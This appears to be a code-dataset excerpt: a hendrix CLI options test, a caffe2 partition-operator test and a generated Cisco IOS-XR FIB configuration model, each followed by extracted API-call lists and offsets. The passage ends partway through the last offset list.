import os import sys from . import HendrixTestCase, TEST_SETTINGS from hendrix.contrib import SettingsError from hendrix.options import options as hx_options from hendrix import ux from mock import patch class TestMain(HendrixTestCase): def setUp(self): super(TestMain, self).setUp() self.DEFAULTS = hx_options() os.environ['DJANGO_SETTINGS_MODULE'] = '' self.devnull = open(os.devnull, 'w') self.args_list = ['hx', 'start'] self.patcher = patch('hendrix.ux.findSettingsModule') self.patcher.start() def tearDown(self): super(TestMain, self).tearDown() self.devnull.close() self.patcher.stop() def test_settings_from_system_variable(self): django_settings = 'django.inanity' with patch('hendrix.ux.findSettingsModule') as findSettingsMod: findSettingsMod.return_value = django_settings options = self.DEFAULTS self.assertEqual(options['settings'], '') options = ux.djangoVsWsgi(options) self.assertEqual(options['settings'], django_settings) def test_settings_wsgi_absense(self): with patch('hendrix.ux.findSettingsModule') as findSettingsMod: findSettingsMod.return_value = "" self.assertRaises(SettingsError, ux.djangoVsWsgi, self.DEFAULTS) def test_user_settings_overrides_system_variable(self): django_settings = 'django.inanity' with patch('hendrix.ux.findSettingsModule') as findSettingsMod: findSettingsMod.return_value = django_settings options = self.DEFAULTS user_settings = 'myproject.settings' options['settings'] = user_settings self.assertEqual(options['settings'], user_settings) options = ux.djangoVsWsgi(options) self.assertEqual(options['settings'], user_settings) def test_wsgi_correct_wsgi_path_works(self): wsgi_dot_path = 'hendrix.test.wsgi' options = self.DEFAULTS options.update({'wsgi': wsgi_dot_path}) options = ux.djangoVsWsgi(options) self.assertEqual(options['wsgi'], wsgi_dot_path) def test_wsgi_wrong_path_raises(self): wsgi_dot_path = '_this.leads.nowhere.man' options = self.DEFAULTS options.update({'wsgi': wsgi_dot_path}) self.assertRaises(ImportError, ux.djangoVsWsgi, options) def test_cwd_exposure(self): cwd = os.getcwd() _path = sys.path sys.path = [p for p in _path if p != cwd] self.assertTrue(cwd not in sys.path) ux.exposeProject(self.DEFAULTS) self.assertTrue(cwd in sys.path) def test_pythonpath(self): options = self.DEFAULTS test_path = os.path.join( os.path.dirname(os.getcwd()), 'hendrix/test/testproject' ) options['pythonpath'] = test_path ux.exposeProject(options) self.assertTrue(test_path in sys.path) sys.path = [p for p in sys.path if p != test_path] def test_shitty_pythonpath(self): options = self.DEFAULTS test_path = '/if/u/have/this/path/you/suck' options['pythonpath'] = test_path self.assertRaises(IOError, ux.exposeProject, options) def test_dev_friendly_options(self): options = self.DEFAULTS options['dev'] = True self.assertFalse(options['reload']) self.assertFalse(options['loud']) options = ux.devFriendly(options) self.assertTrue(options['reload']) self.assertTrue(options['loud']) def test_noise_control_daemonize(self): options = self.DEFAULTS options['quiet'] = True options['daemonize'] = True stdout = sys.stdout stderr = sys.stderr redirect = ux.noiseControl(options) self.assertEqual(sys.stdout.name, stdout.name) self.assertEqual(sys.stderr.name, stderr.name) self.assertEqual(redirect, None) def test_noise_control_traceback(self): options = self.DEFAULTS options['quiet'] = True options['daemonize'] = True options['traceback'] = True stdout = sys.stdout stderr = sys.stderr redirect = ux.noiseControl(options) self.assertEqual(sys.stdout.name, stdout.name) 
self.assertEqual(sys.stderr.name, stderr.name) self.assertEqual(redirect, None) def test_main_with_daemonize(self): sys.argv = self.args_list + ['-d', '--settings', TEST_SETTINGS] class Process(object): def poll(self): return 0 with patch('time.sleep'): with patch('subprocess.Popen') as popen: popen.return_value = Process() ux.main() self.assertTrue(popen.called) self.assertTrue('--settings' in popen.call_args[0][0]) sys.argv = [] def test_options_structure(self): """ A test to ensure that HendrixDeploy.options also has the complete set of options available """ deploy = self.wsgiDeploy() expected_keys = self.DEFAULTS.keys() actual_keys = deploy.options.keys() self.assertListEqual(expected_keys, actual_keys)
[ "hendrix.options.options", "mock.patch", "hendrix.ux.noiseControl", "hendrix.ux.djangoVsWsgi", "os.getcwd", "hendrix.ux.main", "hendrix.ux.devFriendly", "hendrix.ux.exposeProject" ]
[((323, 335), 'hendrix.options.options', 'hx_options', ([], {}), '()\n', (333, 335), True, 'from hendrix.options import options as hx_options\n'), ((495, 533), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (500, 533), False, 'from mock import patch\n'), ((2090, 2114), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (2105, 2114), False, 'from hendrix import ux\n'), ((2460, 2471), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2469, 2471), False, 'import os\n'), ((2600, 2631), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['self.DEFAULTS'], {}), '(self.DEFAULTS)\n', (2616, 2631), False, 'from hendrix import ux\n'), ((2912, 2937), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['options'], {}), '(options)\n', (2928, 2937), False, 'from hendrix import ux\n'), ((3479, 3502), 'hendrix.ux.devFriendly', 'ux.devFriendly', (['options'], {}), '(options)\n', (3493, 3502), False, 'from hendrix import ux\n'), ((3807, 3831), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (3822, 3831), False, 'from hendrix import ux\n'), ((4240, 4264), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\n', (4255, 4264), False, 'from hendrix import ux\n'), ((793, 831), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (798, 831), False, 'from mock import patch\n'), ((1023, 1047), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1038, 1047), False, 'from hendrix import ux\n'), ((1171, 1209), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1176, 1209), False, 'from mock import patch\n'), ((1470, 1508), 'mock.patch', 'patch', (['"""hendrix.ux.findSettingsModule"""'], {}), "('hendrix.ux.findSettingsModule')\n", (1475, 1508), False, 'from mock import patch\n'), ((1808, 1832), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\n', (1823, 1832), False, 'from hendrix import ux\n'), ((4628, 4647), 'mock.patch', 'patch', (['"""time.sleep"""'], {}), "('time.sleep')\n", (4633, 4647), False, 'from mock import patch\n'), ((2799, 2810), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2808, 2810), False, 'import os\n'), ((4666, 4691), 'mock.patch', 'patch', (['"""subprocess.Popen"""'], {}), "('subprocess.Popen')\n", (4671, 4691), False, 'from mock import patch\n'), ((4765, 4774), 'hendrix.ux.main', 'ux.main', ([], {}), '()\n', (4772, 4774), False, 'from hendrix import ux\n')]
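TestMain above repeatedly patches hendrix.ux.findSettingsModule so that settings resolution can be exercised without a real Django project; the technique is plain unittest.mock. A self-contained sketch of the same pattern against a stand-in object (hendrix itself is not required; the names below are hypothetical):

from types import SimpleNamespace
from unittest import mock

# Stand-in for the module whose settings discovery gets stubbed in the tests above.
settings_probe = SimpleNamespace(find_settings=lambda: '')

with mock.patch.object(settings_probe, 'find_settings',
                       return_value='myproject.settings'):
    # Code under test that calls find_settings() now sees the stubbed value.
    assert settings_probe.find_settings() == 'myproject.settings'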
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

import numpy as np

from caffe2.python import core, workspace
from caffe2.python.test_util import TestCase, rand_array


class TestPartitionOps(TestCase):
    def test_configs(self):
        # (main dims, partitions, main type, [list of (extra dims, type)])
        configs = [
            ((10, ), 3),
            ((4, ), 10),
            ((10, 10), 4),
            ((100, ), 2),
            ((5, ), 1),
            ((1, ), 1),
            ((2, 10), 2),
        ]
        suffixes = [
            [],
            [((2, 2), np.float32)],
            [((3, ), np.int64), ((2, ), np.float32)],
        ]
        return [
            (main_dims, parts, main_type, extra, pack)
            for main_dims, parts in configs
            for main_type in [np.int32, np.int64]
            for extra in suffixes
            for pack in [False, True]
        ]

    def testPartition(self):
        for main_dims, parts, main_type, extra_ins, pack in self.test_configs():
            ins = ['in' + str(i) for i in range(1 + len(extra_ins))]
            outs = [
                'in{}_p{}'.format(j, i)
                for i in range(parts)
                for j in range(1 + len(extra_ins))
            ]
            op = core.CreateOperator(
                'Partition', ins, outs, pack_first_input=(1 if pack else 0))
            x = []
            for i, (dims, t) in enumerate([((), main_type)] + extra_ins):
                if t in [np.float32, np.float64]:
                    d = rand_array(*(main_dims + dims))
                else:
                    d = np.random.randint(-100, 100, (main_dims + dims))
                    d = d.astype(t)
                workspace.FeedBlob(ins[i], d)
                x.append(d)

            def sharding(x):
                # numpy has proper modulo op that yields non-negative results
                shards = (x[0] % parts).reshape([-1])
                out = []
                for i in range(parts):
                    for ind, v in enumerate(x):
                        suffix_shape = v.shape[len(x[0].shape):]
                        accum = []
                        data = v.reshape((-1, ) + suffix_shape)
                        if pack and ind == 0:
                            data = data // parts

                        for j, s in enumerate(shards):
                            if s == i:
                                accum.append(data[j])

                        def join(a):
                            if not a:
                                return np.empty(shape=(0, ) + suffix_shape)
                            return np.stack(a)

                        out.append(join(accum))
                return out

            workspace.RunOperatorOnce(op)
            ref = sharding(x)
            print(x)
            print(ref)
            for name, expected in zip(outs, ref):
                np.testing.assert_array_equal(
                    expected, workspace.FetchBlob(name)
                )

            # test inverse operation (GatherByKey)
            if len(main_dims) == 1:
                # currently only 1D key tensor supported
                for i in range(len(extra_ins)):
                    expected_out = ins[i + 1]
                    gather_ins = [ins[0]] + [
                        outs[len(ins) * p + i + 1] for p in range(parts)]
                    actual_out = expected_out + '_actual'
                    op = core.CreateOperator(
                        'GatherByKey', gather_ins, actual_out)
                    workspace.RunOperatorOnce(op)
                    expected = workspace.FetchBlob(expected_out)
                    actual = workspace.FetchBlob(actual_out)
                    np.testing.assert_array_equal(expected, actual)

    def testLengthsPartition(self):
        for main_dims, parts, main_type, extra_ins, pack in self.test_configs():
            # For LengthsSharding only 1-D tensors supported as a first input
            if len(main_dims) > 1:
                continue
            ins = ['in' + str(i) for i in range(2 + len(extra_ins))]
            outs = [
                'in{}_p{}'.format(j, i)
                for i in range(parts)
                for j in range(2 + len(extra_ins))
            ]
            op = core.CreateOperator(
                'LengthsPartition', ins, outs,
                pack_first_input=(1 if pack else 0)
            )
            x = []
            for i, (dims, t) in enumerate([((), main_type)] + extra_ins):
                if t in [np.float32, np.float64]:
                    d = rand_array(*(main_dims + dims))
                else:
                    d = np.random.randint(-100, 100, (main_dims + dims))
                    d = d.astype(t)
                workspace.FeedBlob(ins[i + 1], d)
                x.append(d)

            # Randomly generate length tensor as well
            elements = np.random.randint(2, 10)
            lengths = []
            total_length = 0
            for _ in range(elements - 1):
                lengths.append(np.random.randint(main_dims[0] - total_length))
                total_length += lengths[-1]
            lengths.append(main_dims[0] - total_length)
            workspace.FeedBlob(ins[0], np.array(lengths, dtype=np.int32))

            def sharding(x):
                # numpy has proper modulo op that yields non-negative results
                shards = (x[0] % parts).reshape([-1])
                out = []
                for i in range(parts):
                    idx = 0
                    sharded_lengths = np.zeros(elements)
                    for ind, length in enumerate(lengths):
                        for _ in range(length):
                            if shards[idx] == i:
                                sharded_lengths[ind] += 1
                            idx += 1
                    out.append(sharded_lengths)

                    for ind, v in enumerate(x):
                        suffix_shape = v.shape[len(x[0].shape):]
                        accum = []
                        data = v.reshape((-1, ) + suffix_shape)
                        if pack and ind == 0:
                            data = data // parts

                        for j, s in enumerate(shards):
                            if s == i:
                                accum.append(data[j])

                        def join(a):
                            if not a:
                                return np.empty(shape=(0, ) + suffix_shape)
                            return np.stack(a)

                        out.append(join(accum))
                return out

            workspace.RunOperatorOnce(op)
            ref = sharding(x)
            for name, expected in zip(outs, ref):
                np.testing.assert_array_equal(
                    expected, workspace.FetchBlob(name)
                )


if __name__ == "__main__":
    import unittest
    unittest.main()
[ "caffe2.python.test_util.rand_array", "caffe2.python.workspace.RunOperatorOnce", "caffe2.python.workspace.FetchBlob", "numpy.array", "numpy.random.randint", "numpy.zeros", "numpy.stack", "numpy.empty", "caffe2.python.core.CreateOperator", "unittest.main", "numpy.testing.assert_array_equal", "caffe2.python.workspace.FeedBlob" ]
[((7638, 7653), 'unittest.main', 'unittest.main', ([], {}), '()\n', (7651, 7653), False, 'import unittest\n'), ((2004, 2082), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""Partition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('Partition', ins, outs, pack_first_input=1 if pack else 0)\n", (2023, 2082), False, 'from caffe2.python import core, workspace\n'), ((3473, 3502), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (3498, 3502), False, 'from caffe2.python import core, workspace\n'), ((5009, 5098), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""LengthsPartition"""', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), "('LengthsPartition', ins, outs, pack_first_input=1 if\n pack else 0)\n", (5028, 5098), False, 'from caffe2.python import core, workspace\n'), ((5625, 5649), 'numpy.random.randint', 'np.random.randint', (['(2)', '(10)'], {}), '(2, 10)\n', (5642, 5649), True, 'import numpy as np\n'), ((7355, 7384), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (7380, 7384), False, 'from caffe2.python import core, workspace\n'), ((2444, 2473), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i]', 'd'], {}), '(ins[i], d)\n', (2462, 2473), False, 'from caffe2.python import core, workspace\n'), ((5485, 5518), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i + 1]', 'd'], {}), '(ins[i + 1], d)\n', (5503, 5518), False, 'from caffe2.python import core, workspace\n'), ((5964, 5997), 'numpy.array', 'np.array', (['lengths'], {'dtype': 'np.int32'}), '(lengths, dtype=np.int32)\n', (5972, 5997), True, 'import numpy as np\n'), ((2269, 2300), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (2279, 2300), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((2347, 2393), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (2364, 2393), True, 'import numpy as np\n'), ((3704, 3729), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (3723, 3729), False, 'from caffe2.python import core, workspace\n'), ((4190, 4248), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['"""GatherByKey"""', 'gather_ins', 'actual_out'], {}), "('GatherByKey', gather_ins, actual_out)\n", (4209, 4248), False, 'from caffe2.python import core, workspace\n'), ((4294, 4323), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\n', (4319, 4323), False, 'from caffe2.python import core, workspace\n'), ((4355, 4388), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['expected_out'], {}), '(expected_out)\n', (4374, 4388), False, 'from caffe2.python import core, workspace\n'), ((4418, 4449), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['actual_out'], {}), '(actual_out)\n', (4437, 4449), False, 'from caffe2.python import core, workspace\n'), ((4470, 4517), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['expected', 'actual'], {}), '(expected, actual)\n', (4499, 4517), True, 'import numpy as np\n'), ((5310, 5341), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\n', (5320, 5341), False, 'from caffe2.python.test_util import TestCase, rand_array\n'), ((5388, 5434), 'numpy.random.randint', 
'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\n', (5405, 5434), True, 'import numpy as np\n'), ((5777, 5823), 'numpy.random.randint', 'np.random.randint', (['(main_dims[0] - total_length)'], {}), '(main_dims[0] - total_length)\n', (5794, 5823), True, 'import numpy as np\n'), ((6291, 6309), 'numpy.zeros', 'np.zeros', (['elements'], {}), '(elements)\n', (6299, 6309), True, 'import numpy as np\n'), ((7542, 7567), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\n', (7561, 7567), False, 'from caffe2.python import core, workspace\n'), ((3372, 3383), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (3380, 3383), True, 'import numpy as np\n'), ((7254, 7265), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\n', (7262, 7265), True, 'import numpy as np\n'), ((3300, 3335), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (3308, 3335), True, 'import numpy as np\n'), ((7182, 7217), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\n', (7190, 7217), True, 'import numpy as np\n')]
""" Cisco_IOS_XR_fib_common_cfg This module contains a collection of YANG definitions for Cisco IOS\-XR fib\-common package configuration. This module contains definitions for the following management objects\: fib\: CEF configuration Copyright (c) 2013\-2018 by Cisco Systems, Inc. All rights reserved. """ from collections import OrderedDict from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64 from ydk.filters import YFilter from ydk.errors import YError, YModelError from ydk.errors.error_handler import handle_type_error as _handle_type_error class FibPbtsFallback(Enum): """ FibPbtsFallback (Enum Class) Fib pbts fallback .. data:: list = 1 Fallback to class number list .. data:: any = 2 Fallback to any class .. data:: drop = 3 Fallback to drop """ list = Enum.YLeaf(1, "list") any = Enum.YLeaf(2, "any") drop = Enum.YLeaf(3, "drop") class FibPbtsForwardClass(Enum): """ FibPbtsForwardClass (Enum Class) Fib pbts forward class .. data:: any = 8 Any class """ any = Enum.YLeaf(8, "any") class Fib(Entity): """ CEF configuration .. attribute:: pbts_forward_class_fallbacks PBTS class configuration **type**\: :py:class:`PbtsForwardClassFallbacks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks>` .. attribute:: platform FIB platform parameters **type**\: :py:class:`Platform <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform>` .. attribute:: auto_hash_recover Set option for automatcially recovering consistent\-hashing state on interface up **type**\: bool .. attribute:: prefer_aib_routes Set options for adjacency routes overriding RIB routes **type**\: bool .. attribute:: encap_sharing_disable Set true to disable encapsulation sharing **type**\: bool .. attribute:: frr_follow_bgp_pic Set option for fast\-reroute to follow BGP PIC update, not to wait for timeout **type**\: bool """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib, self).__init__() self._top_entity = None self.yang_name = "fib" self.yang_parent_name = "Cisco-IOS-XR-fib-common-cfg" self.is_top_level_class = True self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("pbts-forward-class-fallbacks", ("pbts_forward_class_fallbacks", Fib.PbtsForwardClassFallbacks)), ("platform", ("platform", Fib.Platform))]) self._leafs = OrderedDict([ ('auto_hash_recover', (YLeaf(YType.boolean, 'auto-hash-recover'), ['bool'])), ('prefer_aib_routes', (YLeaf(YType.boolean, 'prefer-aib-routes'), ['bool'])), ('encap_sharing_disable', (YLeaf(YType.boolean, 'encap-sharing-disable'), ['bool'])), ('frr_follow_bgp_pic', (YLeaf(YType.boolean, 'frr-follow-bgp-pic'), ['bool'])), ]) self.auto_hash_recover = None self.prefer_aib_routes = None self.encap_sharing_disable = None self.frr_follow_bgp_pic = None self.pbts_forward_class_fallbacks = Fib.PbtsForwardClassFallbacks() self.pbts_forward_class_fallbacks.parent = self self._children_name_map["pbts_forward_class_fallbacks"] = "pbts-forward-class-fallbacks" self.platform = Fib.Platform() self.platform.parent = self self._children_name_map["platform"] = "platform" self._segment_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib, ['auto_hash_recover', 'prefer_aib_routes', 'encap_sharing_disable', 'frr_follow_bgp_pic'], name, value) class PbtsForwardClassFallbacks(Entity): """ PBTS class configuration .. 
attribute:: pbts_forward_class_fallback Set PBTS class for fallback **type**\: list of :py:class:`PbtsForwardClassFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback>` """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.PbtsForwardClassFallbacks, self).__init__() self.yang_name = "pbts-forward-class-fallbacks" self.yang_parent_name = "fib" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("pbts-forward-class-fallback", ("pbts_forward_class_fallback", Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))]) self._leafs = OrderedDict() self.pbts_forward_class_fallback = YList(self) self._segment_path = lambda: "pbts-forward-class-fallbacks" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.PbtsForwardClassFallbacks, [], name, value) class PbtsForwardClassFallback(Entity): """ Set PBTS class for fallback .. attribute:: forward_class_number (key) PBTS forward class number **type**\: union of the below types: **type**\: :py:class:`FibPbtsForwardClass <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsForwardClass>` **type**\: int **range:** 0..8 .. attribute:: fallback_type Set PBTS fallback type **type**\: :py:class:`FibPbtsFallback <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.FibPbtsFallback>` **mandatory**\: True .. attribute:: fallback_class_number_array Set PBTS fallback class number array **type**\: list of int **range:** 0..7 """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, self).__init__() self.yang_name = "pbts-forward-class-fallback" self.yang_parent_name = "pbts-forward-class-fallbacks" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['forward_class_number'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('forward_class_number', (YLeaf(YType.str, 'forward-class-number'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsForwardClass', ''),'int'])), ('fallback_type', (YLeaf(YType.enumeration, 'fallback-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsFallback', '')])), ('fallback_class_number_array', (YLeafList(YType.uint32, 'fallback-class-number-array'), ['int'])), ]) self.forward_class_number = None self.fallback_type = None self.fallback_class_number_array = [] self._segment_path = lambda: "pbts-forward-class-fallback" + "[forward-class-number='" + str(self.forward_class_number) + "']" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/pbts-forward-class-fallbacks/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, ['forward_class_number', 'fallback_type', 'fallback_class_number_array'], name, value) class Platform(Entity): """ FIB platform parameters .. 
attribute:: label_switched_multicast Options for label\-switched\-multicast parameters **type**\: :py:class:`LabelSwitchedMulticast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg.Fib.Platform.LabelSwitchedMulticast>` """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.Platform, self).__init__() self.yang_name = "platform" self.yang_parent_name = "fib" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("label-switched-multicast", ("label_switched_multicast", Fib.Platform.LabelSwitchedMulticast))]) self._leafs = OrderedDict() self.label_switched_multicast = Fib.Platform.LabelSwitchedMulticast() self.label_switched_multicast.parent = self self._children_name_map["label_switched_multicast"] = "label-switched-multicast" self._segment_path = lambda: "platform" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.Platform, [], name, value) class LabelSwitchedMulticast(Entity): """ Options for label\-switched\-multicast parameters .. attribute:: frr_holdtime Set time to keep FRR slots programmed post FRR **type**\: int **range:** 3..180 **units**\: second """ _prefix = 'fib-common-cfg' _revision = '2017-05-01' def __init__(self): super(Fib.Platform.LabelSwitchedMulticast, self).__init__() self.yang_name = "label-switched-multicast" self.yang_parent_name = "platform" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('frr_holdtime', (YLeaf(YType.uint32, 'frr-holdtime'), ['int'])), ]) self.frr_holdtime = None self._segment_path = lambda: "label-switched-multicast" self._absolute_path = lambda: "Cisco-IOS-XR-fib-common-cfg:fib/platform/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(Fib.Platform.LabelSwitchedMulticast, ['frr_holdtime'], name, value) def clone_ptr(self): self._top_entity = Fib() return self._top_entity
[ "collections.OrderedDict", "ydk.types.YLeafList", "ydk.types.YLeaf", "ydk.types.YList", "ydk.types.Enum.YLeaf" ]
[((906, 927), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(1)', '"""list"""'], {}), "(1, 'list')\n", (916, 927), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((939, 959), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(2)', '"""any"""'], {}), "(2, 'any')\n", (949, 959), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((972, 993), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(3)', '"""drop"""'], {}), "(3, 'drop')\n", (982, 993), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((1161, 1181), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(8)', '"""any"""'], {}), "(8, 'any')\n", (1171, 1181), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2597, 2761), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallbacks', ('pbts_forward_class_fallbacks', Fib.\n PbtsForwardClassFallbacks)), ('platform', ('platform', Fib.Platform))]"], {}), "([('pbts-forward-class-fallbacks', (\n 'pbts_forward_class_fallbacks', Fib.PbtsForwardClassFallbacks)), (\n 'platform', ('platform', Fib.Platform))])\n", (2608, 2761), False, 'from collections import OrderedDict\n'), ((4804, 4943), 'collections.OrderedDict', 'OrderedDict', (["[('pbts-forward-class-fallback', ('pbts_forward_class_fallback', Fib.\n PbtsForwardClassFallbacks.PbtsForwardClassFallback))]"], {}), "([('pbts-forward-class-fallback', ('pbts_forward_class_fallback',\n Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])\n", (4815, 4943), False, 'from collections import OrderedDict\n'), ((4966, 4979), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (4977, 4979), False, 'from collections import OrderedDict\n'), ((5028, 5039), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\n', (5033, 5039), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((8949, 9064), 'collections.OrderedDict', 'OrderedDict', (["[('label-switched-multicast', ('label_switched_multicast', Fib.Platform.\n LabelSwitchedMulticast))]"], {}), "([('label-switched-multicast', ('label_switched_multicast', Fib.\n Platform.LabelSwitchedMulticast))])\n", (8960, 9064), False, 'from collections import OrderedDict\n'), ((9086, 9099), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (9097, 9099), False, 'from collections import OrderedDict\n'), ((6945, 6960), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (6956, 6960), False, 'from collections import OrderedDict\n'), ((10516, 10531), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\n', (10527, 10531), False, 'from collections import OrderedDict\n'), ((2823, 2864), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""auto-hash-recover"""'], {}), "(YType.boolean, 'auto-hash-recover')\n", (2828, 2864), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((2913, 2954), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '"""prefer-aib-routes"""'], {}), "(YType.boolean, 'prefer-aib-routes')\n", (2918, 2954), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\n'), ((3007, 3052), 
